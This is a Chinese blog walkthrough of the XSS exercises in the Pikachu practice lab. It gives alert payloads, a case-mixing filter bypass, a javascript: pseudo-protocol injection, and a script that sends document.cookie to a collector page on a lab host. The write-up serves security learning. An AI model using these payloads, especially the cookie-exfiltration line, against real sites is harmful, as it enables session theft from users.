靶场pikachu系列(XSS)

最新推荐文章于 2024-11-04 10:41:16 发布
最新推荐文章于 2024-11-04 10:41:16 发布
阅读量150 收藏 1
点赞数
分类专栏: 靶场 文章标签: 安全漏洞 xss javascript
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45605313/article/details/106387569
版权
本文深入探讨XSS(跨站脚本)攻击的各种类型,包括反射型、存储型和DOM型,详细解析攻击手法如利用payload注入恶意脚本,绕过过滤机制,以及如何通过JavaScript伪协议实现攻击。同时,文章提供了实例演示,如使用payload获取cookie并发送至后台。
摘要由CSDN通过智能技术生成

XSS

反射型get
审查元素修改maxlength,payload:<script>alert("a");</script>
在这里插入图片描述
post
登陆后payload:<script>alert("a");</script>
在这里插入图片描述
利用bp
在这里插入图片描述
存储型
payload:<script>alert(document.cookie);</script>
在这里插入图片描述
在这里插入图片描述
DOM型
伪协议payload:javascript:alert(/a/)
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
盲打:将信息提交到后台
在这里插入图片描述
/pikachu/vul/xss/xssblind/admin_login.php页面登录后弹框
在这里插入图片描述
过滤:测试过滤
在这里插入图片描述
过滤了<script
在这里插入图片描述
过滤了</script
在这里插入图片描述
大小写绕过

payload:<scRipt>alert("a");</ScriPt>

在这里插入图片描述
成功弹出
在这里插入图片描述
htmlspecialchars:默认把预定义的字符 “<” (小于)和 “>” (大于)转换为 HTML 实体
在这里插入图片描述
利用JavaScript伪协议
在这里插入图片描述
href输出:伪协议
在这里插入图片描述
js输出:输入被动态的生成到了javascript中
先闭合<script>标签
payload:</script><script>alert("a");</script>
在这里插入图片描述
在这里插入图片描述
XSS后台
获取cookie
将获得的cookie发至后台

<script>document.location = 'http://192.168.238.131/pikachu/pkxss/xcookie/cookie.php?cookie=' + document.cookie;</script>

在这里插入图片描述
在这里插入图片描述
cript

~~...
关注
专栏目录
pikachu靶场环境
02-12
在"Pikachu靶场"中,用户通常会遇到各种网络安全挑战,包括但不限于Web应用漏洞挖掘(如SQL注入、XSS跨站脚本攻击、文件包含漏洞等)、网络服务漏洞利用(如FTP、SMTP、SSH等服务的漏洞)、密码学概念应用(如加密与...
pikachu靶场通关-Cross-Site Scripting(XSS)
qq_43381463的博客
02-05 293
pikachu靶场通关-Cross-Site Scripting(XSS)
pikachu平台之xss漏洞
qq_42728977的博客
12-16 3099
反射型xss(get) 原理 传递的参数直接存在页面代码中,而且没有过滤 流程 打开页面 发现有长度限制,F12进行修改 。 输入特殊字符,检查是否有过滤 发现并没有过滤,而且直接在页面代码中了 存在xss漏洞,尝试输入<script>alert(xss)</script>,发现有长度限制,用F12修改后。 反射型xss(post) ...
Pikachu漏洞靶场 XSS(跨站脚本攻击)
柠檬i的博客
04-04 4173
payload合集
pikachuXSS(初学者总结)
av11566的博客
05-09 1323
目录 1.反射型XSS(get) 2.反射型XSS(post) 3.存储型xss DOM型XSS DOM型xss-x xss之盲打 XSS之过滤 xss之htmlspecialchars XSS之href XSS-js输出 1.反射型XSS(get) 获取cookie '><script>alert(document.cookie)</script> 根据提示先输入一个kobe试试,输入框有长度限制先改个大的(多长的脚本也不怕了) ..
pikachu皮卡丘靶机伪协议文件包含
weixin_41689182的博客
02-25 231
pikachu靶机伪协议
pikachu-master靶场
07-14
"pikachu-master靶场" 是一个专门为网络安全学习和实践设计的平台,它通常包含了一系列的挑战,旨在帮助用户提升其在黑客攻防、漏洞挖掘、安全防护等领域的技能。这个压缩包文件“pikachu-master”很可能包含了该...
sql和xss靶场资料包.zip
12-21
bWAPP latest.zip DVWA-master.zip pikachu-master.zip sqli-labs-master.zip upload-labs-master-21.zip xss闯关小游戏.Zip xxe-lab-masteri靶场.rar PhpStudy20180211.zip vc9x86(必装).eXe vc11 x86.exe
pikachu靶场搭建
02-27
pikachu靶场中,你会遇到各种Web安全漏洞,例如SQL注入、命令注入、跨站脚本(XSS)、跨站请求伪造(CSRF)、文件包含漏洞、权限绕过等。通过实践,你可以学习到如何利用这些漏洞,同时也能理解如何预防它们。例如...
网络安全 - 综合靶场 - PIKACHU 源码包 - pikachu-master.zip
09-22
这个源码包通常包含了 PIKACHU 靶场的全部代码,可以部署到本地服务器上进行学习和测试。 ### 主要特点 - **多漏洞场景**:包括但不限于 XSS(跨站脚本攻击)、SQL 注入、CSRF(跨站请求伪造)、文件上传漏洞、文件...
文件包含漏洞& 文件伪协议利用
永远都没有了
09-11 1818
可能你会问,为什么不是php后缀名而是txt格式,因为我尝试过了,如果是使用的是php格式,那么服务端访问的时候不仅不需要解析,而且只是单纯的访问我的php代码,执行的是我自己的脚本,而不是服务器。就有题目所说是远程包含漏洞,我也懒得测试了,可以发现输入百度链接的时候直接跳转,那么我们可以尝试构造一句话木马搭建在本地的服务,让文件包含解析到攻击者的文本文件而成功的触发到让脚本代码得到解析。我在测试的时候忘记了自己的网站服务是搭建在D盘里,而我的文件是在E盘所以我以为是我的文件包含代码写错了。
XSS跨站脚本攻击之 pikachu 靶场练习
Goodric的博客
01-08 772
XSS漏洞测试 形成XSS漏洞的主要原因是程序对输入和输出没有做合适的处理,导致“精心构造”的字符输出在前端时被浏览器当作有效代码解析执行从而产生危害。 因此在XSS漏洞的防范上,一般会采用 “对输入进行过滤” 和 “输出进行转义” 的方式进行处理: 输入过滤:对输入进行过滤,不允许可能导致XSS攻击的字符输入; 输出转义:根据输出点的位置对输出到前端的内容进行适当转义。 上一文进行了初始XSS,了解了它的一些基础知识:初始XSS 以下通过皮卡出靶场的 “Cross-Site Scripting”测
渗透测试-xss钓鱼测试和xss盲打
lza20001103的博客
04-24 2459
渗透测试-xss钓鱼测试和xss盲打
pikachu漏洞平台学习笔记6_File Inclusion
qq_38933307的博客
04-01 272
1.概述 文件包含,是一个功能。在各种开发语言中都提供了内置的文件包含函数,其可以使开发人员在一个代码文件中直接包含(引入)另外一个代码文件。 比如 在PHP中,提供了: include(),include_once() require(),require_once() 这些文件包含函数,这些函数在代码设计中被经常使用到。 大多数情况下,文件包含函数中包含的代码文件是固定的,因此也不会出现安全问题。 但是,有些时候,文件包含的代码文件被写成了一个变量,且这个变量可以由前端用户传进来,这种情况下,如果没
pikachu xss攻击模块 信息安全 xss漏洞 详细分析
yzcn
12-10 564
XSS攻击跨站脚本漏洞测试流程反射型xss(get)反射型xss(post)存储型xss实例:xss钓鱼DOM型xssDom型xss-xXss盲打Xss之过滤Xss之htmlspecialcharsXss之href输出Xss之js输出Xss常见防范措施 跨站脚本漏洞测试流程 在目标站点上找到输入点,比如查询接口,留言板等。 输入一组特殊字符+唯一标识符号,点击提交后,查看返回的源码,看是否有做对应的处理。 通过搜索定位到唯一字符,结合唯一字符前后语法确认是否可以进行构造执行js的条件(构造闭合)。
Pikachu漏洞练习平台实验——XSS(二)
dishan4749253的博客
09-21 2628
概述 反射型XSS(get) XSS案例:盗取Cookie 反射型XSS(post) 存储型XSS XSS案例:钓鱼攻击 XSS案例:键盘记录 DOM型XSS DOM型XSS-X XSS之盲打 XSS之过滤 XSS之htmlspecialchars XSS常见防范措施 XSS之href输出 XSS之js输出 XSS常见Payload ...
pikachu xss合集(下)
小城的博客
12-17 1331
大家好,我是小城,一个刚刚起步的学渣,笨鸟先飞,可惜我领悟得太晚。但从现在开始,我会努力加油进取变强!
#渗透测试#SRC漏洞挖掘#XSS跨站脚本介绍02绕过
soc的博客
11-03 836
免责声明 本教程仅为合法的教学目的而准备,严禁用于任何形式的违法犯罪活动及其他商业行为,在使用本教程前,您应确保该行为符合当地的法律法规,继续阅读即表示您需自行承担所有操作的后果,如有异议,请立即停止本文章阅读。
XSS跨站脚本攻击的实现原理及讲解
最新发布
weixin_59571541的博客
11-04 429
XSS攻击的本质是攻击者在web页面插入恶意的script代码(这个代码可以是JS脚本、CSS样式或其他意料之外的代码),当用户浏览该页面时,嵌入其中的script代码会被执行,从而达到恶意攻击用户的目的。反射型XSS通常用于通过邮件或搜索引擎等将带有XSS攻击代码的链接投放给用户,用户点击链接后,页面会从URL上取出对应的参数,渲染到页面上,此时攻击代码将会被执行。2. **脚本在用户浏览器中执行**:一旦恶意脚本被注入到受害者的网页中,它将在用户浏览器中执行,攻击者可利用此执行环境进行进一步攻击。
pikachu靶场xss
05-24
Pikachu 靶场是一款用于学习和测试 Web 安全漏洞的免费开源平台,其中包括了 XSS 攻击的相关漏洞。 首先,你需要在本地安装好 Pikcahu 靶场,然后进入靶场XSS 模块。在该模块中,你可以看到已经准备好的一些 XSS...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值